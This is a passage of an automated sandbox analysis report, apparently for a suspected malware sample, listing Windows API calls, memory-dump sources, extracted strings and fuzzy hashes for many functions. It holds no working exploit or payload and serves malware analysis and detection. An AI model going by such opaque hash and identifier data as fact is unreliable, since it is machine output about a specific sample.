                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                              • String ID:
                                                              • API String ID: 3016257755-0
                                                              • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                              • Instruction ID: 28c744ff2f87b86975b6df1f002b2063e6344aeda8ec72286f16d6602a6e1d6e
                                                              • Instruction Fuzzy Hash: 25014C7244814ABBCF165F84CC01CEE3F62BB18359F598456FE1898131E23BD9B1AB96
                                                              APIs
                                                              • GetWindowRect.USER32(?,?), ref: 004BB2E4
                                                              • ScreenToClient.USER32(?,?), ref: 004BB2FC
                                                              • ScreenToClient.USER32(?,?), ref: 004BB320
                                                              • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004BB33B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ClientRectScreen$InvalidateWindow
                                                              • String ID:
                                                              • API String ID: 357397906-0
                                                              • Opcode ID: a518392d6bbca83a4ad9600f9d642c8dfd3cda363d6032af9f4cbaba327217bc
                                                              • Instruction ID: abc8358ba2db95d4d8af01185c77c1af934d7bf35c6ddab4150fa2b8251ee018
                                                              • Instruction Fuzzy Hash: D6114775D00609EFDB41CF99C844AEEBBF5FF18310F108166E914E3620D775AA558F94
                                                              APIs
                                                              • EnterCriticalSection.KERNEL32(?), ref: 00496BE6
                                                                • Part of subcall function 004976C4: _memset.LIBCMT ref: 004976F9
                                                              • _memmove.LIBCMT ref: 00496C09
                                                              • _memset.LIBCMT ref: 00496C16
                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00496C26
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection_memset$EnterLeave_memmove
                                                              • String ID:
                                                              • API String ID: 48991266-0
                                                              • Opcode ID: 3300c88ab316c7b9bf073b0d4a20f36e4f3364aea9093623d244bfc2bf6acd47
                                                              • Instruction ID: 07e5677f8ba46f438ce65dbfe3b837f458b658d2804001bb351c84bc3a49b38a
                                                              • Instruction Fuzzy Hash: 20F0303A100100BBCF056F56DC85A8ABF29EF45325B0480A6FE085E227C735A815CBB8
                                                              APIs
                                                              • GetSysColor.USER32(00000008), ref: 00432231
                                                              • SetTextColor.GDI32(?,000000FF), ref: 0043223B
                                                              • SetBkMode.GDI32(?,00000001), ref: 00432250
                                                              • GetStockObject.GDI32(00000005), ref: 00432258
                                                              • GetWindowDC.USER32(?,00000000), ref: 0046BE83
                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 0046BE90
                                                              • GetPixel.GDI32(00000000,?,00000000), ref: 0046BEA9
                                                              • GetPixel.GDI32(00000000,00000000,?), ref: 0046BEC2
                                                              • GetPixel.GDI32(00000000,?,?), ref: 0046BEE2
                                                              • ReleaseDC.USER32(?,00000000), ref: 0046BEED
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                              • String ID:
                                                              • API String ID: 1946975507-0
                                                              • Opcode ID: 0efafcc7998f5acc0d9b43945beb39e4f6f3cb3c0976d3f70c05c839031b4f4c
                                                              • Instruction ID: eada655894c1a0ec08da87cc7db9a939d211872530865d313df21f1b8497a3d0
                                                              • Instruction Fuzzy Hash: 7EE03932104244ABDF215FA8EC0D7D93B10EB05332F008376FA6D980E197B24994DB16
                                                              APIs
                                                              • GetCurrentThread.KERNEL32 ref: 0048871B
                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,004882E6), ref: 00488722
                                                              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,004882E6), ref: 0048872F
                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,004882E6), ref: 00488736
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: CurrentOpenProcessThreadToken
                                                              • String ID:
                                                              • API String ID: 3974789173-0
                                                              • Opcode ID: 802032cc05765ba0af61c860e6ea5ca56e5bbb3591430d2de927062f4e4924b2
                                                              • Instruction ID: 347d384f763158cc324a8abbf51bc1a71f3589b0a44ce4d76aef45ee09074202
                                                              • Instruction Fuzzy Hash: 8AE08636615211ABD7206FB05D0CB5B3BBCEF54791F144838B649C9050DA388449C754
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: %L
                                                              • API String ID: 0-1940408768
                                                              • Opcode ID: 40a5f43df0b10c0957a2b5515221a0a07695d52c92d969f79db30fb6346da466
                                                              • Instruction ID: 1c104f26fbb69cad1d058a9b85c08d299fe767c31f82a2eede6e967104ff1677
                                                              • Instruction Fuzzy Hash: 58B1C471D0010AAACF24EF94C4819FEB7B5EF5C314F51A02BE941A7291DB389D82CB9D
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: __itow_s
                                                              • String ID: xbO$xbO
                                                              • API String ID: 3653519197-426669150
                                                              • Opcode ID: ad70f6037c522d48275f3732b7c034acd29042bc795bff8b498e229b1b36b7ea
                                                              • Instruction ID: 845f6965280580b7760cd6c1828b31985a464b0d274ac7e4b113f496b17eab1c
                                                              • Instruction Fuzzy Hash: A3B19070600109EFCB14DF65C891EBABBB9FF59344F14805BF9459B292EB38D941CB98
                                                              APIs
                                                                • Part of subcall function 0044FC86: _wcscpy.LIBCMT ref: 0044FCA9
                                                                • Part of subcall function 00439837: __itow.LIBCMT ref: 00439862
                                                                • Part of subcall function 00439837: __swprintf.LIBCMT ref: 004398AC
                                                              • __wcsnicmp.LIBCMT ref: 0049B02D
                                                              • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0049B0F6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                              • String ID: LPT
                                                              • API String ID: 3222508074-1350329615
                                                              • Opcode ID: 53eb3c12e791efbf345e7341df8764a7add08b0210f5c52c41c2ceb42cd2863d
                                                              • Instruction ID: 1fadece54e1a2d9a2170c11f2936b1475ca77b7ede9437f89960b467744d3231
                                                              • Opcode Fuzzy Hash: 53eb3c12e791efbf345e7341df8764a7add08b0210f5c52c41c2ceb42cd2863d
                                                              • Instruction Fuzzy Hash: 4C619375A00215EFCF14DF94D992EAEBBB4EB08350F10406AF816AB351D778AE44CB99
                                                              APIs
                                                              • Sleep.KERNEL32(00000000), ref: 00442968
                                                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 00442981
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: GlobalMemorySleepStatus
                                                              • String ID: @
                                                              • API String ID: 2783356886-2766056989
                                                              • Opcode ID: a5dbd513ff2efd448b15a9e56a5f51acc60c0dd497d39e05ac874576e2c633bb
                                                              • Instruction ID: 7f63ea04729ada54793b515282d8fc33302b16c75a41dee6fbc9c7e034b949e8
                                                              • Opcode Fuzzy Hash: a5dbd513ff2efd448b15a9e56a5f51acc60c0dd497d39e05ac874576e2c633bb
                                                              • Instruction Fuzzy Hash: F45138714187449BD320EF11D886BABBBE8FB89344F41485EF2D8810A1DB759929CB5A
                                                              APIs
                                                                • Part of subcall function 00434F0B: __fread_nolock.LIBCMT ref: 00434F29
                                                              • _wcscmp.LIBCMT ref: 00499824
                                                              • _wcscmp.LIBCMT ref: 00499837
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: _wcscmp$__fread_nolock
                                                              • String ID: FILE
                                                              • API String ID: 4029003684-3121273764
                                                              • Opcode ID: afec2adaf6b8254b3ff030608d24184e61bf46639249f7b8f41425bcf5c73ef7
                                                              • Instruction ID: 844ca108f498ff9d8333dbccdc10814d3a95c623cc0cb88d0c7570745d13a229
                                                              • Opcode Fuzzy Hash: afec2adaf6b8254b3ff030608d24184e61bf46639249f7b8f41425bcf5c73ef7
                                                              • Instruction Fuzzy Hash: 1D41AA71A00219BADF109AA5CC45FEF7BB9DF89714F00047FF904A7181D675AD058765
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ClearVariant
                                                              • String ID: DdO$DdO
                                                              • API String ID: 1473721057-3688882967
                                                              • Opcode ID: e8faa9439242551212b6bb1653ae07b9c39c96f711bbc0dc64c18978360fd816
                                                              • Instruction ID: 80f26a36df3eaa3945cfe7a8cc9e57fe0dfe68cc6fe60363518c350c4ad2a585
                                                              • Opcode Fuzzy Hash: e8faa9439242551212b6bb1653ae07b9c39c96f711bbc0dc64c18978360fd816
                                                              • Instruction Fuzzy Hash: 195122786043418FDB54DF18C480A2BBBF1BB99354F54986EE8858B321D339EC91CF4A
                                                              APIs
                                                              • _memset.LIBCMT ref: 004A259E
                                                              • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 004A25D4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: CrackInternet_memset
                                                              • String ID: |
                                                              • API String ID: 1413715105-2343686810
                                                              • Opcode ID: 5d2af376f292f6c985fa9d9edc5caf52bcd5cad43d04bae6728bc464681a8250
                                                              • Instruction ID: ef0063a33eb437d73ed0c89e47420f7099f6d16eaf468581e8660f4b1d24e7f4
                                                              • Opcode Fuzzy Hash: 5d2af376f292f6c985fa9d9edc5caf52bcd5cad43d04bae6728bc464681a8250
                                                              • Instruction Fuzzy Hash: E9313971801119ABCF11EFA5CC85EEEBFB8FF19304F10105AF914B6162DB355916DB64
                                                              APIs
                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 004B7B61
                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 004B7B76
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: '
                                                              • API String ID: 3850602802-1997036262
                                                              • Opcode ID: c02239a3a0af4f938d99d75c8c0db705bb55c81b402c45e2cb12fd5940c2ff0d
                                                              • Instruction ID: 9982d7110f106f463a02453332080d964272b63a703186e82a0fb48849733d7c
                                                              • Opcode Fuzzy Hash: c02239a3a0af4f938d99d75c8c0db705bb55c81b402c45e2cb12fd5940c2ff0d
                                                              • Instruction Fuzzy Hash: 08413974A082099FDB54CF68C880BEABBB5FF48304F10416AE904EB381D774A951CFA4
                                                              APIs
                                                              • DestroyWindow.USER32(?,?,?,?), ref: 004B6B17
                                                              • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 004B6B53
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Window$DestroyMove
                                                              • String ID: static
                                                              • API String ID: 2139405536-2160076837
                                                              • Opcode ID: 5be553ee0ab6215fc6c76fad21b2b55bb37ef88bb6d36c875915c7e2fbe85155
                                                              • Instruction ID: 16530a0ceb86f8bc0f5ddbe55308d52785fe629b78d8bb438af0c17eafb4909b
                                                              • Opcode Fuzzy Hash: 5be553ee0ab6215fc6c76fad21b2b55bb37ef88bb6d36c875915c7e2fbe85155
                                                              • Instruction Fuzzy Hash: 5931AE71110604AADB109F69CC40BFB73B9FF48724F11862AF9A9D3290DA38AC51CB68
                                                              APIs
                                                              • _memset.LIBCMT ref: 00492911
                                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0049294C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: InfoItemMenu_memset
                                                              • String ID: 0
                                                              • API String ID: 2223754486-4108050209
                                                              • Opcode ID: e7ecfbfc5602f83940e77b70c465381fb59a237458312d08fe6f8ff530d5ad42
                                                              • Instruction ID: 4783cfa0e4c92332b82c53b4b3f56daa05678e51c35307234d707232dc34c6ba
                                                              • Opcode Fuzzy Hash: e7ecfbfc5602f83940e77b70c465381fb59a237458312d08fe6f8ff530d5ad42
                                                              • Instruction Fuzzy Hash: 1531F471600305BBDF24DE48CA45BAFBFB8EF45350F14003AE980A62A1D7B89944CB59
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 004B6761
                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004B676C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: Combobox
                                                              • API String ID: 3850602802-2096851135
                                                              • Opcode ID: e542e55905173c821667088946b297fbac814ff45512ab7898c47cb65a283a13
                                                              • Instruction ID: 13a17a7c40439ca74728f3ed4e4104743290fc8ac9792b8509954a086f73af58
                                                              • Opcode Fuzzy Hash: e542e55905173c821667088946b297fbac814ff45512ab7898c47cb65a283a13
                                                              • Instruction Fuzzy Hash: 341186752002087FEF119F55CC81EFB376AEB48368F11452AF91897290DA7D9C5187B4
                                                              APIs
                                                                • Part of subcall function 00431D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00431D73
                                                                • Part of subcall function 00431D35: GetStockObject.GDI32(00000011), ref: 00431D87
                                                                • Part of subcall function 00431D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00431D91
                                                              • GetWindowRect.USER32(00000000,?), ref: 004B6C71
                                                              • GetSysColor.USER32(00000012), ref: 004B6C8B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                              • String ID: static
                                                              • API String ID: 1983116058-2160076837
                                                              • Opcode ID: 97661a0327282c03e8f235e58f039e6fda912b35d2eb303bb798c520744f16ca
                                                              • Instruction ID: 806d0c5983c38ed6b3aa1ef88c8929a7845e43f4714302c9d2c02c2b88e674c0
                                                              • Opcode Fuzzy Hash: 97661a0327282c03e8f235e58f039e6fda912b35d2eb303bb798c520744f16ca
                                                              • Instruction Fuzzy Hash: 22211472610209AFDF14DFB8CC45AFA7BB8FB08314F11462AFD99D2250D639E861DB64
                                                              APIs
                                                              • GetWindowTextLengthW.USER32(00000000), ref: 004B69A2
                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004B69B1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: LengthMessageSendTextWindow
                                                              • String ID: edit
                                                              • API String ID: 2978978980-2167791130
                                                              • Opcode ID: dedbe89c6e7fc2b54ab55831016cde4ced33e6ebfe68fd1c4f5555089a9151d9
                                                              • Instruction ID: a92fb91f5f7af9a0311891073e77b379c3d7dc61e83910852eb032209a177ce1
                                                              • Opcode Fuzzy Hash: dedbe89c6e7fc2b54ab55831016cde4ced33e6ebfe68fd1c4f5555089a9151d9
                                                              • Instruction Fuzzy Hash: D6118FB1100208ABEF108E68DC40AFB37A9EB05378F614726F9A5972E0C77DDC559778
                                                              APIs
                                                              • _memset.LIBCMT ref: 00492A22
                                                              • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00492A41
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: InfoItemMenu_memset
                                                              • String ID: 0
                                                              • API String ID: 2223754486-4108050209
                                                              • Opcode ID: 2ff79ea5066d1411ba82203cd3800e97373e026e5437c213b79ea39a5f17f5e0
                                                              • Instruction ID: e36571b5be2ced7d85662dea750a09ec2866ef944b460403f31d0dd329ad172f
                                                              • Opcode Fuzzy Hash: 2ff79ea5066d1411ba82203cd3800e97373e026e5437c213b79ea39a5f17f5e0
                                                              • Instruction Fuzzy Hash: 2F11B173901115BBCF30DA58DE44FAF7BA8AB46304F044033E955A72A0D7B8AD0AC799
                                                              APIs
